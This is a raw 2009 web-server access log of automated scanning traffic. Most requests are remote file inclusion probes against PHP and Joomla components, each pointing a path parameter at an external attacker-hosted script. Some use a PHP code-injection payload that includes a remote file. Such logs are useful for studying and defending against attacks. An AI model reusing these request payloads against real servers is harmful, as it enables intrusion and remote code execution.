123.214.172.12 - - [17/Apr/2009:11:55:40 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.basalt.ru/fx29id2.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
123.214.172.12 - - [17/Apr/2009:11:55:40 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.basalt.ru/fx29id2.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
123.214.172.12 - - [17/Apr/2009:11:55:40 -0500] "GET /logs/access_log.1234828800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.basalt.ru/fx29id2.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.202.134 - - [17/Apr/2009:11:56:31 -0500] "GET /logs/access_log.1233964800/?sIncPath=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:11:56:33 -0500] "GET /?sIncPath=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:11:56:33 -0500] "GET /logs/?sIncPath=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 200 185881 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:11:56:43 -0500] "GET /logs/access_log.1233964800/?sIncPath=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.64.202.134 - - [17/Apr/2009:11:56:43 -0500] "GET /?sIncPath=http://www.jobs.traders.cc//id?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.64.202.134 - - [17/Apr/2009:11:56:44 -0500] "GET /logs/?sIncPath=http://www.jobs.traders.cc//id?? HTTP/1.1" 200 185881 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.64.202.134 - - [17/Apr/2009:11:57:39 -0500] "GET /logs/access_log.1234656000/?sIncPath=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:11:57:47 -0500] "GET /logs/access_log.1234656000/?sIncPath=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
200.93.147.154 - - [17/Apr/2009:11:57:57 -0500] "GET /logs/access_log.1233964800/?sIncPath=http://www.geocities.com/windiayu35/idpit.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.93.147.154 - - [17/Apr/2009:11:58:18 -0500] "GET /?sIncPath=http://www.geocities.com/windiayu35/idpit.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.93.147.154 - - [17/Apr/2009:11:58:20 -0500] "GET /logs/?sIncPath=http://www.geocities.com/windiayu35/idpit.txt??? HTTP/1.1" 200 185881 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.93.147.154 - - [17/Apr/2009:11:59:40 -0500] "GET /logs/access_log.1234656000/?sIncPath=http://www.geocities.com/windiayu35/idpit.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
85.17.108.215 - - [17/Apr/2009:12:00:14 -0500] "GET /logs//?path%5Bdocroot%5D=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 200 185886 "-""libwww-perl/5.79"
85.17.108.215 - - [17/Apr/2009:12:00:14 -0500] "GET //?path%5Bdocroot%5D=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
85.17.108.215 - - [17/Apr/2009:12:00:43 -0500] "GET /logs//?path%5Bdocroot%5D=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 200 185886 "-""libwww-perl/5.79"
85.17.108.215 - - [17/Apr/2009:12:00:44 -0500] "GET //?path%5Bdocroot%5D=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
121.126.12.7 - - [17/Apr/2009:12:01:01 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
121.126.12.7 - - [17/Apr/2009:12:01:01 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.19.178.235 - - [17/Apr/2009:12:01:15 -0500] "GET /logs/errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
65.19.178.235 - - [17/Apr/2009:12:01:15 -0500] "GET /errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
121.126.12.7 - - [17/Apr/2009:12:01:45 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
121.126.12.7 - - [17/Apr/2009:12:01:46 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
210.109.101.217 - - [17/Apr/2009:12:02:40 -0500] "GET /logs//?path%5Bdocroot%5D=http://in.geocities.com/awalaboyz/cid.txt??? HTTP/1.1" 200 185886 "-""libwww-perl/5.79"
210.109.101.217 - - [17/Apr/2009:12:02:41 -0500] "GET //?path%5Bdocroot%5D=http://in.geocities.com/awalaboyz/cid.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
65.55.208.144 - - [17/Apr/2009:12:04:21 -0500] "GET /logs/access_log.1238025600 HTTP/1.1" 200 249330 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
218.246.20.221 - - [17/Apr/2009:12:04:39 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.246.20.221 - - [17/Apr/2009:12:04:47 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.193.239.31 - - [17/Apr/2009:12:06:04 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
212.193.239.31 - - [17/Apr/2009:12:06:04 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
98.129.21.154 - - [17/Apr/2009:12:09:31 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
98.129.21.154 - - [17/Apr/2009:12:09:31 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
98.129.21.154 - - [17/Apr/2009:12:09:31 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
98.129.21.154 - - [17/Apr/2009:12:09:35 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.19.178.235 - - [17/Apr/2009:12:11:10 -0500] "GET /logs/errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
65.19.178.235 - - [17/Apr/2009:12:11:10 -0500] "GET /errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
202.75.4.169 - - [17/Apr/2009:12:11:31 -0500] "GET /logs/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.75.4.169 - - [17/Apr/2009:12:11:32 -0500] "GET /errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
85.17.108.215 - - [17/Apr/2009:12:13:02 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
85.17.108.215 - - [17/Apr/2009:12:13:02 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
85.17.108.215 - - [17/Apr/2009:12:13:12 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
85.17.108.215 - - [17/Apr/2009:12:13:12 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
67.212.165.114 - - [17/Apr/2009:12:21:18 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:12:21:18 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:12:21:19 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:12:21:19 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
202.75.4.169 - - [17/Apr/2009:12:24:08 -0500] "GET /logs/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.75.4.169 - - [17/Apr/2009:12:24:09 -0500] "GET /errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
77.221.130.18 - - [17/Apr/2009:12:24:21 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://anggey.selfip.com/har/fx29id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:12:24:21 -0500] "GET //include/admin.lib.inc.php?site_path=http://anggey.selfip.com/har/fx29id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:12:24:21 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://anggey.selfip.com/har/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:12:24:21 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://anggey.selfip.com/har/fx29id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.55.213.2 - - [17/Apr/2009:12:24:22 -0500] "GET /index.inc.php?PATH_Includes=http://cms.globalweb.jp/board/conf/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.813"
74.55.213.2 - - [17/Apr/2009:12:24:22 -0500] "GET /logs/index.inc.php?PATH_Includes=http://cms.globalweb.jp/board/conf/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.813"
203.147.62.92 - - [17/Apr/2009:12:27:03 -0500] "GET /logs//index.php?themesdir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
203.147.62.92 - - [17/Apr/2009:12:27:03 -0500] "GET //index.php?themesdir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
208.64.230.12 - - [17/Apr/2009:12:27:18 -0500] "GET /logs//index.php?themesdir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
208.64.230.12 - - [17/Apr/2009:12:27:18 -0500] "GET //index.php?themesdir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
208.64.202.134 - - [17/Apr/2009:12:27:36 -0500] "GET /logs/access_log.1235952000/?INCLUDE_FOLDER=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.64.202.134 - - [17/Apr/2009:12:27:37 -0500] "GET /?INCLUDE_FOLDER=http://www.jobs.traders.cc//id?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.64.202.134 - - [17/Apr/2009:12:27:37 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.jobs.traders.cc//id?? HTTP/1.1" 200 185881 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
217.130.244.44 - - [17/Apr/2009:12:28:11 -0500] "GET /logs//index.php?themesdir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
217.130.244.44 - - [17/Apr/2009:12:28:11 -0500] "GET //index.php?themesdir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
74.55.213.2 - - [17/Apr/2009:12:28:32 -0500] "GET /logs/agendax/addevent.inc.php?agendax_path=http://cms.globalweb.jp/board/conf/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.813"
74.55.213.2 - - [17/Apr/2009:12:28:32 -0500] "GET /agendax/addevent.inc.php?agendax_path=http://cms.globalweb.jp/board/conf/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.813"
203.147.62.92 - - [17/Apr/2009:12:28:34 -0500] "GET /logs//index.php?themesdir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
203.147.62.92 - - [17/Apr/2009:12:28:35 -0500] "GET //index.php?themesdir=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
208.64.202.134 - - [17/Apr/2009:12:29:46 -0500] "GET /logs/access_log.1235952000/?INCLUDE_FOLDER=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:12:29:46 -0500] "GET /?INCLUDE_FOLDER=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:12:29:47 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 200 185881 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:12:30:17 -0500] "GET /logs/access_log.1237161600/?INCLUDE_FOLDER=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.64.202.134 - - [17/Apr/2009:12:30:30 -0500] "GET /logs/access_log.1237161600/?INCLUDE_FOLDER=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.221.130.18 - - [17/Apr/2009:12:31:55 -0500] "GET /logs/errors.php?error=http://anggey.selfip.com/har/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:12:31:55 -0500] "GET /logs/access_log.1236470400/errors.php?error=http://anggey.selfip.com/har/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:12:31:56 -0500] "GET /errors.php?error=http://anggey.selfip.com/har/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:12:32:28 -0500] "GET /logs/access_log.1236124800/errors.php?error=http://anggey.selfip.com/har/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.191.89.65 - - [17/Apr/2009:12:44:59 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://asbak1.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.191.89.65 - - [17/Apr/2009:12:44:59 -0500] "GET /logs/access_log.1235692800//s_loadenv.inc.php?DOCUMENT_ROOT=http://asbak1.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.191.89.65 - - [17/Apr/2009:12:44:59 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://asbak1.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
88.191.89.65 - - [17/Apr/2009:12:44:59 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://asbak1.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
74.55.213.2 - - [17/Apr/2009:12:49:15 -0500] "GET /expanded.php?conf=http://cms.globalweb.jp/board/conf/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.813"
74.55.213.2 - - [17/Apr/2009:12:49:15 -0500] "GET /logs/expanded.php?conf=http://cms.globalweb.jp/board/conf/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.813"
211.43.212.111 - - [17/Apr/2009:12:50:28 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.43.212.111 - - [17/Apr/2009:12:50:28 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.43.212.111 - - [17/Apr/2009:12:50:28 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
208.64.202.134 - - [17/Apr/2009:12:51:40 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:12:51:41 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:12:51:41 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.23.122.131 - - [17/Apr/2009:12:52:49 -0500] "GET //accounts/inc/errors.php?error=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
209.23.122.131 - - [17/Apr/2009:12:52:49 -0500] "GET /logs//accounts/inc/errors.php?error=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
209.23.122.131 - - [17/Apr/2009:12:52:49 -0500] "GET /logs/access_log.1234742400//accounts/inc/errors.php?error=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
209.23.122.131 - - [17/Apr/2009:12:52:57 -0500] "GET /logs/access_log.1232323200//accounts/inc/errors.php?error=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
208.64.202.134 - - [17/Apr/2009:12:53:01 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.64.202.134 - - [17/Apr/2009:12:53:02 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.64.202.134 - - [17/Apr/2009:12:53:02 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
211.43.212.111 - - [17/Apr/2009:12:54:09 -0500] "GET /logs/access_log.1238803200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:12:54:47 -0500] "GET /logs//accounts/inc/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:12:54:47 -0500] "GET /logs/access_log.1234742400//accounts/inc/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:12:54:47 -0500] "GET //accounts/inc/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:12:55:00 -0500] "GET /logs/access_log.1232323200//accounts/inc/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
195.137.160.91 - - [17/Apr/2009:12:55:35 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.look22.de/slideshow/javascript/i6.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.810"
195.137.160.91 - - [17/Apr/2009:12:55:35 -0500] "GET /logs/access_log.1230076800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.look22.de/slideshow/javascript/i6.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
195.137.160.91 - - [17/Apr/2009:12:55:35 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.look22.de/slideshow/javascript/i6.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
83.138.144.89 - - [17/Apr/2009:12:56:19 -0500] "GET //accounts/inc/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:12:56:19 -0500] "GET /logs/access_log.1234742400//accounts/inc/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:12:56:19 -0500] "GET /logs//accounts/inc/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:12:56:33 -0500] "GET /logs/access_log.1232323200//accounts/inc/errors.php?error=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
208.64.202.134 - - [17/Apr/2009:12:56:49 -0500] "GET /logs/access_log.1236297600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
208.64.202.134 - - [17/Apr/2009:12:58:06 -0500] "GET /logs/access_log.1236297600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
195.137.160.91 - - [17/Apr/2009:12:59:21 -0500] "GET /logs/access_log.1230163200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.look22.de/slideshow/javascript/i6.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
195.137.160.91 - - [17/Apr/2009:12:59:21 -0500] "GET /logs/access_log.1235174400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.look22.de/slideshow/javascript/i6.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
208.80.195.39 - - [17/Apr/2009:12:59:23 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; yplus 5.1.02b)"
195.137.160.91 - - [17/Apr/2009:13:00:03 -0500] "GET /logs/access_log.1231200000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.look22.de/slideshow/javascript/i6.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
77.221.130.17 - - [17/Apr/2009:13:00:23 -0500] "GET /errors.php?error=http://anggey.selfip.com/har/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
77.221.130.17 - - [17/Apr/2009:13:00:23 -0500] "GET /logs/errors.php?error=http://anggey.selfip.com/har/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.17 - - [17/Apr/2009:13:00:23 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://anggey.selfip.com/har/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.221.130.17 - - [17/Apr/2009:13:00:51 -0500] "GET /logs/access_log.1236643200/errors.php?error=http://anggey.selfip.com/har/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.137.160.91 - - [17/Apr/2009:13:00:53 -0500] "GET /logs/access_log.1236384000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.look22.de/slideshow/javascript/i6.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
